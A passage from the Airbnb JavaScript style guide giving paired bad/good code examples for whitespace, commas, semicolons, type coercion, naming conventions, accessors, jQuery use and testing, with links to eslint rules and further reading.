function test(){
console.log('test');
}
// good
function test() {
console.log('test');
}
// bad
dog.set('attr',{
age: '1 year',
breed: 'Bernese Mountain Dog',
});
// good
dog.set('attr', {
age: '1 year',
breed: 'Bernese Mountain Dog',
});
```
<a name="whitespace--around-keywords"></a><a name="18.3"></a>
- [19.3](#whitespace--around-keywords) Place 1 space before the opening parenthesis in control statements (`if`, `while` etc.). Place no space between the argument list and the function name in function calls and declarations. eslint: [`keyword-spacing`](https://eslint.org/docs/rules/keyword-spacing)
```javascript
// bad
if(isJedi) {
fight ();
}
// good
if (isJedi) {
fight();
}
// bad
function fight () {
console.log ('Swooosh!');
}
// good
function fight() {
console.log('Swooosh!');
}
```
<a name="whitespace--infix-ops"></a><a name="18.4"></a>
- [19.4](#whitespace--infix-ops) Set off operators with spaces. eslint: [`space-infix-ops`](https://eslint.org/docs/rules/space-infix-ops)
```javascript
// bad
const x=y+5;
// good
const x = y + 5;
```
<a name="whitespace--newline-at-end"></a><a name="18.5"></a>
- [19.5](#whitespace--newline-at-end) End files with a single newline character. eslint: [`eol-last`](https://eslint.org/docs/rules/eol-last)
```javascript
// bad
import { es6 } from './AirbnbStyleGuide';
// ...
export default es6;
```
```javascript
// bad
import { es6 } from './AirbnbStyleGuide';
// ...
export default es6;↵
↵
```
```javascript
// good
import { es6 } from './AirbnbStyleGuide';
// ...
export default es6;↵
```
<a name="whitespace--chains"></a><a name="18.6"></a>
- [19.6](#whitespace--chains) Use indentation when making long method chains (more than 2 method chains). Use a leading dot, which
emphasizes that the line is a method call, not a new statement. eslint: [`newline-per-chained-call`](https://eslint.org/docs/rules/newline-per-chained-call) [`no-whitespace-before-property`](https://eslint.org/docs/rules/no-whitespace-before-property)
```javascript
// bad
$('#items').find('.selected').highlight().end().find('.open').updateCount();
// bad
$('#items').
find('.selected').
highlight().
end().
find('.open').
updateCount();
// good
$('#items')
.find('.selected')
.highlight()
.end()
.find('.open')
.updateCount();
// bad
const leds = stage.selectAll('.led').data(data).enter().append('svg:svg').classed('led', true)
.attr('width', (radius + margin) * 2).append('svg:g')
.attr('transform', `translate(${radius + margin}, ${radius + margin})`)
.call(tron.led);
// good
const leds = stage.selectAll('.led')
.data(data)
.enter().append('svg:svg')
.classed('led', true)
.attr('width', (radius + margin) * 2)
.append('svg:g')
.attr('transform', `translate(${radius + margin}, ${radius + margin})`)
.call(tron.led);
// good
const leds = stage.selectAll('.led').data(data);
const svg = leds.enter().append('svg:svg');
svg.classed('led', true).attr('width', (radius + margin) * 2);
const g = svg.append('svg:g');
g.attr('transform', `translate(${radius + margin}, ${radius + margin})`).call(tron.led);
```
<a name="whitespace--after-blocks"></a><a name="18.7"></a>
- [19.7](#whitespace--after-blocks) Leave a blank line after blocks and before the next statement.
```javascript
// bad
if (foo) {
return bar;
}
return baz;
// good
if (foo) {
return bar;
}
return baz;
// bad
const obj = {
foo() {
},
bar() {
},
};
return obj;
// good
const obj = {
foo() {
},
bar() {
},
};
return obj;
// bad
const arr = [
function foo() {
},
function bar() {
},
];
return arr;
// good
const arr = [
function foo() {
},
function bar() {
},
];
return arr;
```
<a name="whitespace--padded-blocks"></a><a name="18.8"></a>
- [19.8](#whitespace--padded-blocks) Do not pad your blocks with blank lines. eslint: [`padded-blocks`](https://eslint.org/docs/rules/padded-blocks)
```javascript
// bad
function bar() {
console.log(foo);
}
// bad
if (baz) {
console.log(quux);
} else {
console.log(foo);
}
// bad
class Foo {
constructor(bar) {
this.bar = bar;
}
}
// good
function bar() {
console.log(foo);
}
// good
if (baz) {
console.log(quux);
} else {
console.log(foo);
}
```
<a name="whitespace--no-multiple-blanks"></a>
- [19.9](#whitespace--no-multiple-blanks) Do not use multiple blank lines to pad your code. eslint: [`no-multiple-empty-lines`](https://eslint.org/docs/rules/no-multiple-empty-lines)
<!-- markdownlint-disable MD012 -->
```javascript
// bad
class Person {
constructor(fullName, email, birthday) {
this.fullName = fullName;
this.email = email;
this.setAge(birthday);
}
setAge(birthday) {
const today = new Date();
const age = this.getAge(today, birthday);
this.age = age;
}
getAge(today, birthday) {
// ..
}
}
// good
class Person {
constructor(fullName, email, birthday) {
this.fullName = fullName;
this.email = email;
this.setAge(birthday);
}
setAge(birthday) {
const today = new Date();
const age = getAge(today, birthday);
this.age = age;
}
getAge(today, birthday) {
// ..
}
}
```
<a name="whitespace--in-parens"></a><a name="18.9"></a>
- [19.10](#whitespace--in-parens) Do not add spaces inside parentheses. eslint: [`space-in-parens`](https://eslint.org/docs/rules/space-in-parens)
```javascript
// bad
function bar( foo ) {
return foo;
}
// good
function bar(foo) {
return foo;
}
// bad
if ( foo ) {
console.log(foo);
}
// good
if (foo) {
console.log(foo);
}
```
<a name="whitespace--in-brackets"></a><a name="18.10"></a>
- [19.11](#whitespace--in-brackets) Do not add spaces inside brackets. eslint: [`array-bracket-spacing`](https://eslint.org/docs/rules/array-bracket-spacing)
```javascript
// bad
const foo = [ 1, 2, 3 ];
console.log(foo[ 0 ]);
// good
const foo = [1, 2, 3];
console.log(foo[0]);
```
<a name="whitespace--in-braces"></a><a name="18.11"></a>
- [19.12](#whitespace--in-braces) Add spaces inside curly braces. eslint: [`object-curly-spacing`](https://eslint.org/docs/rules/object-curly-spacing)
```javascript
// bad
const foo = {clark: 'kent'};
// good
const foo = { clark: 'kent' };
```
<a name="whitespace--max-len"></a><a name="18.12"></a>
- [19.13](#whitespace--max-len) Avoid having lines of code that are longer than 100 characters (including whitespace). Note: per [above](#strings--line-length), long strings are exempt from this rule, and should not be broken up. eslint: [`max-len`](https://eslint.org/docs/rules/max-len)
> Why? This ensures readability and maintainability.
```javascript
// bad
const foo = jsonData && jsonData.foo && jsonData.foo.bar && jsonData.foo.bar.baz && jsonData.foo.bar.baz.quux && jsonData.foo.bar.baz.quux.xyzzy;
// bad
$.ajax({ method: 'POST', url: 'https://airbnb.com/', data: { name: 'John' } }).done(() => console.log('Congratulations!')).fail(() => console.log('You have failed this city.'));
// good
const foo = jsonData
&& jsonData.foo
&& jsonData.foo.bar
&& jsonData.foo.bar.baz
&& jsonData.foo.bar.baz.quux
&& jsonData.foo.bar.baz.quux.xyzzy;
// better
const foo = jsonData
?.foo
?.bar
?.baz
?.quux
?.xyzzy;
// good
$.ajax({
method: 'POST',
url: 'https://airbnb.com/',
data: { name: 'John' },
})
.done(() => console.log('Congratulations!'))
.fail(() => console.log('You have failed this city.'));
```
<a name="whitespace--block-spacing"></a>
- [19.14](#whitespace--block-spacing) Require consistent spacing inside an open block token and the next token on the same line. This rule also enforces consistent spacing inside a close block token and previous token on the same line. eslint: [`block-spacing`](https://eslint.org/docs/rules/block-spacing)
```javascript
// bad
function foo() {return true;}
if (foo) { bar = 0;}
// good
function foo() { return true; }
if (foo) { bar = 0; }
```
<a name="whitespace--comma-spacing"></a>
- [19.15](#whitespace--comma-spacing) Avoid spaces before commas and require a space after commas. eslint: [`comma-spacing`](https://eslint.org/docs/rules/comma-spacing)
```javascript
// bad
const foo = 1,bar = 2;
const arr = [1 , 2];
// good
const foo = 1, bar = 2;
const arr = [1, 2];
```
<a name="whitespace--computed-property-spacing"></a>
- [19.16](#whitespace--computed-property-spacing) Enforce spacing inside of computed property brackets. eslint: [`computed-property-spacing`](https://eslint.org/docs/rules/computed-property-spacing)
```javascript
// bad
obj[foo ]
obj[ 'foo']
const x = {[ b ]: a}
obj[foo[ bar ]]
// good
obj[foo]
obj['foo']
const x = { [b]: a }
obj[foo[bar]]
```
<a name="whitespace--func-call-spacing"></a>
- [19.17](#whitespace--func-call-spacing) Avoid spaces between functions and their invocations. eslint: [`func-call-spacing`](https://eslint.org/docs/rules/func-call-spacing)
```javascript
// bad
func ();
func
();
// good
func();
```
<a name="whitespace--key-spacing"></a>
- [19.18](#whitespace--key-spacing) Enforce spacing between keys and values in object literal properties. eslint: [`key-spacing`](https://eslint.org/docs/rules/key-spacing)
```javascript
// bad
const obj = { foo : 42 };
const obj2 = { foo:42 };
// good
const obj = { foo: 42 };
```
<a name="whitespace--no-trailing-spaces"></a>
- [19.19](#whitespace--no-trailing-spaces) Avoid trailing spaces at the end of lines. eslint: [`no-trailing-spaces`](https://eslint.org/docs/rules/no-trailing-spaces)
<a name="whitespace--no-multiple-empty-lines"></a>
- [19.20](#whitespace--no-multiple-empty-lines) Avoid multiple empty lines, only allow one newline at the end of files, and avoid a newline at the beginning of files. eslint: [`no-multiple-empty-lines`](https://eslint.org/docs/rules/no-multiple-empty-lines)
<!-- markdownlint-disable MD012 -->
```javascript
// bad - multiple empty lines
const x = 1;
const y = 2;
// bad - 2+ newlines at end of file
const x = 1;
const y = 2;
// bad - 1+ newline(s) at beginning of file
const x = 1;
const y = 2;
// good
const x = 1;
const y = 2;
```
<!-- markdownlint-enable MD012 -->
**[⬆ back to top](#table-of-contents)**
## Commas
<a name="commas--leading-trailing"></a><a name="19.1"></a>
- [20.1](#commas--leading-trailing) Leading commas: **Nope.** eslint: [`comma-style`](https://eslint.org/docs/rules/comma-style)
```javascript
// bad
const story = [
once
, upon
, aTime
];
// good
const story = [
once,
upon,
aTime,
];
// bad
const hero = {
firstName: 'Ada'
, lastName: 'Lovelace'
, birthYear: 1815
, superPower: 'computers'
};
// good
const hero = {
firstName: 'Ada',
lastName: 'Lovelace',
birthYear: 1815,
superPower: 'computers',
};
```
<a name="commas--dangling"></a><a name="19.2"></a>
- [20.2](#commas--dangling) Additional trailing comma: **Yup.** eslint: [`comma-dangle`](https://eslint.org/docs/rules/comma-dangle)
> Why? This leads to cleaner git diffs. Also, transpilers like Babel will remove the additional trailing comma in the transpiled code which means you don’t have to worry about the [trailing comma problem](https://github.com/airbnb/javascript/blob/es5-deprecated/es5/README.md#commas) in legacy browsers.
```diff
// bad - git diff without trailing comma
const hero = {
firstName: 'Florence',
- lastName: 'Nightingale'
+ lastName: 'Nightingale',
+ inventorOf: ['coxcomb chart', 'modern nursing']
};
// good - git diff with trailing comma
const hero = {
firstName: 'Florence',
lastName: 'Nightingale',
+ inventorOf: ['coxcomb chart', 'modern nursing'],
};
```
```javascript
// bad
const hero = {
firstName: 'Dana',
lastName: 'Scully'
};
const heroes = [
'Batman',
'Superman'
];
// good
const hero = {
firstName: 'Dana',
lastName: 'Scully',
};
const heroes = [
'Batman',
'Superman',
];
// bad
function createHero(
firstName,
lastName,
inventorOf
) {
// does nothing
}
// good
function createHero(
firstName,
lastName,
inventorOf,
) {
// does nothing
}
// good (note that a comma must not appear after a "rest" element)
function createHero(
firstName,
lastName,
inventorOf,
...heroArgs
) {
// does nothing
}
// bad
createHero(
firstName,
lastName,
inventorOf
);
// good
createHero(
firstName,
lastName,
inventorOf,
);
// good (note that a comma must not appear after a "rest" element)
createHero(
firstName,
lastName,
inventorOf,
...heroArgs
);
```
**[⬆ back to top](#table-of-contents)**
## Semicolons
<a name="semicolons--required"></a><a name="20.1"></a>
- [21.1](#semicolons--required) **Yup.** eslint: [`semi`](https://eslint.org/docs/rules/semi)
> Why? When JavaScript encounters a line break without a semicolon, it uses a set of rules called [Automatic Semicolon Insertion](https://tc39.github.io/ecma262/#sec-automatic-semicolon-insertion) to determine whether it should regard that line break as the end of a statement, and (as the name implies) place a semicolon into your code before the line break if it thinks so. ASI contains a few eccentric behaviors, though, and your code will break if JavaScript misinterprets your line break. These rules will become more complicated as new features become a part of JavaScript. Explicitly terminating your statements and configuring your linter to catch missing semicolons will help prevent you from encountering issues.
```javascript
// bad - raises exception
const luke = {}
const leia = {}
[luke, leia].forEach((jedi) => jedi.father = 'vader')
// bad - raises exception
const reaction = "No! That’s impossible!"
(async function meanwhileOnTheFalcon() {
// handle `leia`, `lando`, `chewie`, `r2`, `c3p0`
// ...
}())
// bad - returns `undefined` instead of the value on the next line - always happens when `return` is on a line by itself because of ASI!
function foo() {
return
'search your feelings, you know it to be foo'
}
// good
const luke = {};
const leia = {};
[luke, leia].forEach((jedi) => {
jedi.father = 'vader';
});
// good
const reaction = 'No! That’s impossible!';
(async function meanwhileOnTheFalcon() {
// handle `leia`, `lando`, `chewie`, `r2`, `c3p0`
// ...
}());
// good
function foo() {
return 'search your feelings, you know it to be foo';
}
```
[Read more](https://stackoverflow.com/questions/7365172/semicolon-before-self-invoking-function/7365214#7365214).
**[⬆ back to top](#table-of-contents)**
## Type Casting & Coercion
<a name="coercion--explicit"></a><a name="21.1"></a>
- [22.1](#coercion--explicit) Perform type coercion at the beginning of the statement.
<a name="coercion--strings"></a><a name="21.2"></a>
- [22.2](#coercion--strings) Strings: eslint: [`no-new-wrappers`](https://eslint.org/docs/rules/no-new-wrappers)
```javascript
// => this.reviewScore = 9;
// bad
const totalScore = new String(this.reviewScore); // typeof totalScore is "object" not "string"
// bad
const totalScore = this.reviewScore + ''; // invokes this.reviewScore.valueOf()
// bad
const totalScore = this.reviewScore.toString(); // isn’t guaranteed to return a string
// good
const totalScore = String(this.reviewScore);
```
<a name="coercion--numbers"></a><a name="21.3"></a>
- [22.3](#coercion--numbers) Numbers: Use `Number` for type casting and `parseInt` always with a radix for parsing strings. eslint: [`radix`](https://eslint.org/docs/rules/radix) [`no-new-wrappers`](https://eslint.org/docs/rules/no-new-wrappers)
> Why? The `parseInt` function produces an integer value dictated by interpretation of the contents of the string argument according to the specified radix. Leading whitespace in string is ignored. If radix is `undefined` or `0`, it is assumed to be `10` except when the number begins with the character pairs `0x` or `0X`, in which case a radix of 16 is assumed. This differs from ECMAScript 3, which merely discouraged (but allowed) octal interpretation. Many implementations have not adopted this behavior as of 2013. And, because older browsers must be supported, always specify a radix.
```javascript
const inputValue = '4';
// bad
const val = new Number(inputValue);
// bad
const val = +inputValue;
// bad
const val = inputValue >> 0;
// bad
const val = parseInt(inputValue);
// good
const val = Number(inputValue);
// good
const val = parseInt(inputValue, 10);
```
<a name="coercion--comment-deviations"></a><a name="21.4"></a>
- [22.4](#coercion--comment-deviations) If for whatever reason you are doing something wild and `parseInt` is your bottleneck and need to use Bitshift for [performance reasons](https://web.archive.org/web/20200414205431/https://jsperf.com/coercion-vs-casting/3), leave a comment explaining why and what you’re doing.
```javascript
// good
/**
* parseInt was the reason my code was slow.
* Bitshifting the String to coerce it to a
* Number made it a lot faster.
*/
const val = inputValue >> 0;
```
<a name="coercion--bitwise"></a><a name="21.5"></a>
- [22.5](#coercion--bitwise) **Note:** Be careful when using bitshift operations. Numbers are represented as [64-bit values](https://es5.github.io/#x4.3.19), but bitshift operations always return a 32-bit integer ([source](https://es5.github.io/#x11.7)). Bitshift can lead to unexpected behavior for integer values larger than 32 bits. [Discussion](https://github.com/airbnb/javascript/issues/109). Largest signed 32-bit Int is 2,147,483,647:
```javascript
2147483647 >> 0; // => 2147483647
2147483648 >> 0; // => -2147483648
2147483649 >> 0; // => -2147483647
```
<a name="coercion--booleans"></a><a name="21.6"></a>
- [22.6](#coercion--booleans) Booleans: eslint: [`no-new-wrappers`](https://eslint.org/docs/rules/no-new-wrappers)
```javascript
const age = 0;
// bad
const hasAge = new Boolean(age);
// good
const hasAge = Boolean(age);
// best
const hasAge = !!age;
```
**[⬆ back to top](#table-of-contents)**
## Naming Conventions
<a name="naming--descriptive"></a><a name="22.1"></a>
- [23.1](#naming--descriptive) Avoid single letter names. Be descriptive with your naming. eslint: [`id-length`](https://eslint.org/docs/rules/id-length)
```javascript
// bad
function q() {
// ...
}
// good
function query() {
// ...
}
```
<a name="naming--camelCase"></a><a name="22.2"></a>
- [23.2](#naming--camelCase) Use camelCase when naming objects, functions, and instances. eslint: [`camelcase`](https://eslint.org/docs/rules/camelcase)
```javascript
// bad
const OBJEcttsssss = {};
const this_is_my_object = {};
function c() {}
// good
const thisIsMyObject = {};
function thisIsMyFunction() {}
```
<a name="naming--PascalCase"></a><a name="22.3"></a>
- [23.3](#naming--PascalCase) Use PascalCase only when naming constructors or classes. eslint: [`new-cap`](https://eslint.org/docs/rules/new-cap)
```javascript
// bad
function user(options) {
this.name = options.name;
}
const bad = new user({
name: 'nope',
});
// good
class User {
constructor(options) {
this.name = options.name;
}
}
const good = new User({
name: 'yup',
});
```
<a name="naming--leading-underscore"></a><a name="22.4"></a>
- [23.4](#naming--leading-underscore) Do not use trailing or leading underscores. eslint: [`no-underscore-dangle`](https://eslint.org/docs/rules/no-underscore-dangle)
> Why? JavaScript does not have the concept of privacy in terms of properties or methods. Although a leading underscore is a common convention to mean “private”, in fact, these properties are fully public, and as such, are part of your public API contract. This convention might lead developers to wrongly think that a change won’t count as breaking, or that tests aren’t needed. tl;dr: if you want something to be “private”, it must not be observably present.
```javascript
// bad
this.__firstName__ = 'Panda';
this.firstName_ = 'Panda';
this._firstName = 'Panda';
// good
this.firstName = 'Panda';
// good, in environments where WeakMaps are available
// see https://kangax.github.io/compat-table/es6/#test-WeakMap
const firstNames = new WeakMap();
firstNames.set(this, 'Panda');
```
<a name="naming--self-this"></a><a name="22.5"></a>
- [23.5](#naming--self-this) Don’t save references to `this`. Use arrow functions or [Function#bind](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Function/bind).
```javascript
// bad
function foo() {
const self = this;
return function () {
console.log(self);
};
}
// bad
function foo() {
const that = this;
return function () {
console.log(that);
};
}
// good
function foo() {
return () => {
console.log(this);
};
}
```
<a name="naming--filename-matches-export"></a><a name="22.6"></a>
- [23.6](#naming--filename-matches-export) A base filename should exactly match the name of its default export.
```javascript
// file 1 contents
class CheckBox {
// ...
}
export default CheckBox;
// file 2 contents
export default function fortyTwo() { return 42; }
// file 3 contents
export default function insideDirectory() {}
// in some other file
// bad
import CheckBox from './checkBox'; // PascalCase import/export, camelCase filename
import FortyTwo from './FortyTwo'; // PascalCase import/filename, camelCase export
import InsideDirectory from './InsideDirectory'; // PascalCase import/filename, camelCase export
// bad
import CheckBox from './check_box'; // PascalCase import/export, snake_case filename
import forty_two from './forty_two'; // snake_case import/filename, camelCase export
import inside_directory from './inside_directory'; // snake_case import, camelCase export
import index from './inside_directory/index'; // requiring the index file explicitly
import insideDirectory from './insideDirectory/index'; // requiring the index file explicitly
// good
import CheckBox from './CheckBox'; // PascalCase export/import/filename
import fortyTwo from './fortyTwo'; // camelCase export/import/filename
import insideDirectory from './insideDirectory'; // camelCase export/import/directory name/implicit "index"
// ^ supports both insideDirectory.js and insideDirectory/index.js
```
<a name="naming--camelCase-default-export"></a><a name="22.7"></a>
- [23.7](#naming--camelCase-default-export) Use camelCase when you export-default a function. Your filename should be identical to your function’s name.
```javascript
function makeStyleGuide() {
// ...
}
export default makeStyleGuide;
```
<a name="naming--PascalCase-singleton"></a><a name="22.8"></a>
- [23.8](#naming--PascalCase-singleton) Use PascalCase when you export a constructor / class / singleton / function library / bare object.
```javascript
const AirbnbStyleGuide = {
es6: {
},
};
export default AirbnbStyleGuide;
```
<a name="naming--Acronyms-and-Initialisms"></a>
- [23.9](#naming--Acronyms-and-Initialisms) Acronyms and initialisms should always be all uppercased, or all lowercased.
> Why? Names are for readability, not to appease a computer algorithm.
```javascript
// bad
import SmsContainer from './containers/SmsContainer';
// bad
const HttpRequests = [
// ...
];
// good
import SMSContainer from './containers/SMSContainer';
// good
const HTTPRequests = [
// ...
];
// also good
const httpRequests = [
// ...
];
// best
import TextMessageContainer from './containers/TextMessageContainer';
// best
const requests = [
// ...
];
```
<a name="naming--uppercase"></a>
- [23.10](#naming--uppercase) You may optionally uppercase a constant only if it (1) is exported, (2) is a `const` (it can not be reassigned), and (3) the programmer can trust it (and its nested properties) to never change.
> Why? This is an additional tool to assist in situations where the programmer would be unsure if a variable might ever change. UPPERCASE_VARIABLES are letting the programmer know that they can trust the variable (and its properties) not to change.
- What about all `const` variables? - This is unnecessary, so uppercasing should not be used for constants within a file. It should be used for exported constants however.
- What about exported objects? - Uppercase at the top level of export (e.g. `EXPORTED_OBJECT.key`) and maintain that all nested properties do not change.
```javascript
// bad
const PRIVATE_VARIABLE = 'should not be unnecessarily uppercased within a file';
// bad
export const THING_TO_BE_CHANGED = 'should obviously not be uppercased';
// bad
export let REASSIGNABLE_VARIABLE = 'do not use let with uppercase variables';
// ---
// allowed but does not supply semantic value
export const apiKey = 'SOMEKEY';
// better in most cases
export const API_KEY = 'SOMEKEY';
// ---
// bad - unnecessarily uppercases key while adding no semantic value
export const MAPPING = {
KEY: 'value'
};
// good
export const MAPPING = {
key: 'value',
};
```
**[⬆ back to top](#table-of-contents)**
## Accessors
<a name="accessors--not-required"></a><a name="23.1"></a>
- [24.1](#accessors--not-required) Accessor functions for properties are not required.
<a name="accessors--no-getters-setters"></a><a name="23.2"></a>
- [24.2](#accessors--no-getters-setters) Do not use JavaScript getters/setters as they cause unexpected side effects and are harder to test, maintain, and reason about. Instead, if you do make accessor functions, use `getVal()` and `setVal('hello')`.
```javascript
// bad
class Dragon {
get age() {
// ...
}
set age(value) {
// ...
}
}
// good
class Dragon {
getAge() {
// ...
}
setAge(value) {
// ...
}
}
```
<a name="accessors--boolean-prefix"></a><a name="23.3"></a>
- [24.3](#accessors--boolean-prefix) If the property/method is a `boolean`, use `isVal()` or `hasVal()`.
```javascript
// bad
if (!dragon.age()) {
return false;
}
// good
if (!dragon.hasAge()) {
return false;
}
```
<a name="accessors--consistent"></a><a name="23.4"></a>
- [24.4](#accessors--consistent) It’s okay to create `get()` and `set()` functions, but be consistent.
```javascript
class Jedi {
constructor(options = {}) {
const lightsaber = options.lightsaber || 'blue';
this.set('lightsaber', lightsaber);
}
set(key, val) {
this[key] = val;
}
get(key) {
return this[key];
}
}
```
**[⬆ back to top](#table-of-contents)**
## Events
<a name="events--hash"></a><a name="24.1"></a>
- [25.1](#events--hash) When attaching data payloads to events (whether DOM events or something more proprietary like Backbone events), pass an object literal (also known as a "hash") instead of a raw value. This allows a subsequent contributor to add more data to the event payload without finding and updating every handler for the event. For example, instead of:
```javascript
// bad
$(this).trigger('listingUpdated', listing.id);
// ...
$(this).on('listingUpdated', (e, listingID) => {
// do something with listingID
});
```
prefer:
```javascript
// good
$(this).trigger('listingUpdated', { listingID: listing.id });
// ...
$(this).on('listingUpdated', (e, data) => {
// do something with data.listingID
});
```
**[⬆ back to top](#table-of-contents)**
## jQuery
<a name="jquery--dollar-prefix"></a><a name="25.1"></a>
- [26.1](#jquery--dollar-prefix) Prefix jQuery object variables with a `$`.
```javascript
// bad
const sidebar = $('.sidebar');
// good
const $sidebar = $('.sidebar');
// good
const $sidebarBtn = $('.sidebar-btn');
```
<a name="jquery--cache"></a><a name="25.2"></a>
- [26.2](#jquery--cache) Cache jQuery lookups.
```javascript
// bad
function setSidebar() {
$('.sidebar').hide();
// ...
$('.sidebar').css({
'background-color': 'pink',
});
}
// good
function setSidebar() {
const $sidebar = $('.sidebar');
$sidebar.hide();
// ...
$sidebar.css({
'background-color': 'pink',
});
}
```
<a name="jquery--queries"></a><a name="25.3"></a>
- [26.3](#jquery--queries) For DOM queries use Cascading `$('.sidebar ul')` or parent > child `$('.sidebar > ul')`. [jsPerf](https://web.archive.org/web/20200414183810/https://jsperf.com/jquery-find-vs-context-sel/16)
<a name="jquery--find"></a><a name="25.4"></a>
- [26.4](#jquery--find) Use `find` with scoped jQuery object queries.
```javascript
// bad
$('ul', '.sidebar').hide();
// bad
$('.sidebar').find('ul').hide();
// good
$('.sidebar ul').hide();
// good
$('.sidebar > ul').hide();
// good
$sidebar.find('ul').hide();
```
**[⬆ back to top](#table-of-contents)**
## ECMAScript 5 Compatibility
<a name="es5-compat--kangax"></a><a name="26.1"></a>
- [27.1](#es5-compat--kangax) Refer to [Kangax](https://twitter.com/kangax/)’s ES5 [compatibility table](https://kangax.github.io/es5-compat-table/).
**[⬆ back to top](#table-of-contents)**
<a name="ecmascript-6-styles"></a>
## ECMAScript 6+ (ES 2015+) Styles
<a name="es6-styles"></a><a name="27.1"></a>
- [28.1](#es6-styles) This is a collection of links to the various ES6+ features.
1. [Arrow Functions](#arrow-functions)
1. [Classes](#classes--constructors)
1. [Object Shorthand](#es6-object-shorthand)
1. [Object Concise](#es6-object-concise)
1. [Object Computed Properties](#es6-computed-properties)
1. [Template Strings](#es6-template-literals)
1. [Destructuring](#destructuring)
1. [Default Parameters](#es6-default-parameters)
1. [Rest](#es6-rest)
1. [Array Spreads](#es6-array-spreads)
1. [Let and Const](#references)
1. [Exponentiation Operator](#es2016-properties--exponentiation-operator)
1. [Iterators and Generators](#iterators-and-generators)
1. [Modules](#modules)
<a name="tc39-proposals"></a>
- [28.2](#tc39-proposals) Do not use [TC39 proposals](https://github.com/tc39/proposals) that have not reached stage 3.
> Why? [They are not finalized](https://tc39.github.io/process-document/), and they are subject to change or to be withdrawn entirely. We want to use JavaScript, and proposals are not JavaScript yet.
**[⬆ back to top](#table-of-contents)**
## Standard Library
The [Standard Library](https://developer.mozilla.org/en/docs/Web/JavaScript/Reference/Global_Objects)
contains utilities that are functionally broken but remain for legacy reasons.
<a name="standard-library--isnan"></a>
- [29.1](#standard-library--isnan) Use `Number.isNaN` instead of global `isNaN`.
eslint: [`no-restricted-globals`](https://eslint.org/docs/rules/no-restricted-globals)
> Why? The global `isNaN` coerces non-numbers to numbers, returning true for anything that coerces to NaN.
> If this behavior is desired, make it explicit.
```javascript
// bad
isNaN('1.2'); // false
isNaN('1.2.3'); // true
// good
Number.isNaN('1.2.3'); // false
Number.isNaN(Number('1.2.3')); // true
```
<a name="standard-library--isfinite"></a>
- [29.2](#standard-library--isfinite) Use `Number.isFinite` instead of global `isFinite`.
eslint: [`no-restricted-globals`](https://eslint.org/docs/rules/no-restricted-globals)
> Why? The global `isFinite` coerces non-numbers to numbers, returning true for anything that coerces to a finite number.
> If this behavior is desired, make it explicit.
```javascript
// bad
isFinite('2e3'); // true
// good
Number.isFinite('2e3'); // false
Number.isFinite(parseInt('2e3', 10)); // true
```
**[⬆ back to top](#table-of-contents)**
## Testing
<a name="testing--yup"></a><a name="28.1"></a>
- [30.1](#testing--yup) **Yup.**
```javascript
function foo() {
return true;
}
```
<a name="testing--for-real"></a><a name="28.2"></a>
- [30.2](#testing--for-real) **No, but seriously**:
- Whichever testing framework you use, you should be writing tests!
- Strive to write many small pure functions, and minimize where mutations occur.
- Be cautious about stubs and mocks - they can make your tests more brittle.
- We primarily use [`mocha`](https://www.npmjs.com/package/mocha) and [`jest`](https://www.npmjs.com/package/jest) at Airbnb. [`tape`](https://www.npmjs.com/package/tape) is also used occasionally for small, separate modules.
- 100% test coverage is a good goal to strive for, even if it’s not always practical to reach it.
- Whenever you fix a bug, *write a regression test*. A bug fixed without a regression test is almost certainly going to break again in the future.
**[⬆ back to top](#table-of-contents)**
## Performance
- [On Layout & Web Performance](https://www.kellegous.com/j/2013/01/26/layout-performance/)
- [String vs Array Concat](https://web.archive.org/web/20200414200857/https://jsperf.com/string-vs-array-concat/2)
- [Try/Catch Cost In a Loop](https://web.archive.org/web/20200414190827/https://jsperf.com/try-catch-in-loop-cost/12)
- [Bang Function](https://web.archive.org/web/20200414205426/https://jsperf.com/bang-function)
- [jQuery Find vs Context, Selector](https://web.archive.org/web/20200414200850/https://jsperf.com/jquery-find-vs-context-sel/164)
- [innerHTML vs textContent for script text](https://web.archive.org/web/20200414205428/https://jsperf.com/innerhtml-vs-textcontent-for-script-text)
- [Long String Concatenation](https://web.archive.org/web/20200414203914/https://jsperf.com/ya-string-concat/38)
- [Are JavaScript functions like `map()`, `reduce()`, and `filter()` optimized for traversing arrays?](https://www.quora.com/JavaScript-programming-language-Are-Javascript-functions-like-map-reduce-and-filter-already-optimized-for-traversing-array/answer/Quildreen-Motta)
- Loading...
**[⬆ back to top](#table-of-contents)**
## Resources
**Learning ES6+**
- [Latest ECMA spec](https://tc39.github.io/ecma262/)
- [ExploringJS](https://exploringjs.com/)
- [ES6 Compatibility Table](https://kangax.github.io/compat-table/es6/)
- [Comprehensive Overview of ES6 Features](http://es6-features.org/)
- [JavaScript Roadmap](https://roadmap.sh/javascript)
**Read This**
- [Standard ECMA-262](https://www.ecma-international.org/ecma-262/6.0/index.html)
**Tools**
- Code Style Linters
- [ESlint](https://eslint.org/) - [Airbnb Style .eslintrc](https://github.com/airbnb/javascript/blob/master/linters/.eslintrc)
- [JSHint](https://jshint.com/) - [Airbnb Style .jshintrc](https://github.com/airbnb/javascript/blob/master/linters/.jshintrc)
- Neutrino Preset - [@neutrinojs/airbnb](https://neutrinojs.org/packages/airbnb/)
**Other Style Guides**
- [Google JavaScript Style Guide](https://google.github.io/styleguide/jsguide.html)
- [Google JavaScript Style Guide (Old)](https://google.github.io/styleguide/javascriptguide.xml)
- [jQuery Core Style Guidelines](https://contribute.jquery.org/style-guide/js/)
- [Principles of Writing Consistent, Idiomatic JavaScript](https://github.com/rwaldron/idiomatic.js)
- [StandardJS](https://standardjs.com)
**Other Styles**
- [Naming this in nested functions](https://gist.github.com/cjohansen/4135065) - Christian Johansen
- [Conditional Callbacks](https://github.com/airbnb/javascript/issues/52) - Ross Allen
- [Popular JavaScript Coding Conventions on GitHub](http://sideeffect.kr/popularconvention/#javascript) - JeongHoon Byun
- [Multiple var statements in JavaScript, not superfluous](https://benalman.com/news/2012/05/multiple-var-statements-javascript/) - Ben Alman
**Further Reading**
- [Understanding JavaScript Closures](https://javascriptweblog.wordpress.com/2010/10/25/understanding-javascript-closures/) - Angus Croll
- [Basic JavaScript for the impatient programmer](https://www.2ality.com/2013/06/basic-javascript.html) - Dr. Axel Rauschmayer
- [You Might Not Need jQuery](https://youmightnotneedjquery.com/) - Zack Bloom & Adam Schwartz
- [ES6 Features](https://github.com/lukehoban/es6features) - Luke Hoban
- [Frontend Guidelines](https://github.com/bendc/frontend-guidelines) - Benjamin De Cock
**Books**
- [JavaScript: The Good Parts](https://www.amazon.com/JavaScript-Good-Parts-Douglas-Crockford/dp/0596517742) - Douglas Crockford
